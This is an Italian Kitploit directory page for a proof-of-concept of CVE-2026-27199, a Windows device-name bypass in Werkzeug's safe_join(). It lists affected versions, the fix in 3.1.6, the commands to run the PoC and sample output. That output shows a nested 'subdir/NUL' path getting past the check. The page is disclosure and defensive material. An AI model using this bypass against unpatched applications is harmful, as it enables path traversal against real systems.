Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-27199-werkzeug-safe-join-bypass-PoC — Proof-of-concept exploit per CVE-2026-27199, un bypass del nome dispositivo Windows in safe_join() di Werkzeug, che dimostra il path traversal e lo scarto silenzioso dei dati. | Kitploit
Strumenti/GitHubGitHub/alimezar/cve-2026-27199-werkzeug-safe-join-bypass-poc
Analisi delle VulnerabilitàExploitSicurezza WebPaper e RicercaApprendimento e Formazione
GitHubalimezar/cve-2026-27199-werkzeug-safe-join-bypass-poc

CVE-2026-27199-werkzeug-safe-join-bypass-PoC

Proof-of-concept exploit per CVE-2026-27199, un bypass del nome dispositivo Windows in safe_join() di Werkzeug, che dimostra il path traversal e lo scarto silenzioso dei dati.

Vedi Repository
6 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC CVE-2026-27199: Bypass dei nomi dispositivo Windows in safe_join() di Werkzeug

Stato: Divulgato pubblicamente. Corretto in werkzeug 3.1.6.
Gravità: Moderata
Segnalatore: @alimezar
Avviso: GHSA-29vq-49wr-vm6x


Versioni interessate

PacchettoInteressatoCorretto
werkzeug< 3.1.63.1.6

Proof of Concept

Richiede: Windows, Python 3.8+, werkzeug < 3.1.6

root@kitploit:~
pip install "werkzeug==3.1.5"
python poc_CVE-2026-27199.py

Output previsto (versione vulnerabile)

root@kitploit:~
============================================================
CVE-2026-27199 — Werkzeug safe_join() PoC
============================================================
[*] Werkzeug version : 3.1.5
[*] os.name          : nt

[+] safe_join(base, 'NUL')        -> None  (bloccato correttamente)
[!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL  (bypass!)

[*] Tentativo di scrittura sul percorso restituito ...
[!] open(NUL annidato) write: SUCCESS — dati scartati silenziosamente dal dispositivo

[!] VULNERABILE: CVE-2026-27199 confermato su questa installazione.
    Aggiornare a werkzeug >= 3.1.6 per rimediare.

Output previsto (versione corretta)

root@kitploit:~
[+] safe_join(base, 'subdir/NUL') -> None  (bloccato correttamente)
[+] NON VULNERABILE: il nome dispositivo annidato è stato bloccato.

Riferimenti

  • GHSA-29vq-49wr-vm6x — questo avviso
  • GHSA-hgf8-39gv-g3f2 — avviso correlato precedente
  • GHSA-87hc-h4r5-73f7 — avviso correlato precedente
  • Changelog di Werkzeug

Questo PoC è pubblicato per scopi educativi e difensivi a seguito della divulgazione responsabile e della disponibilità pubblica della patch.

Scarica lo strumento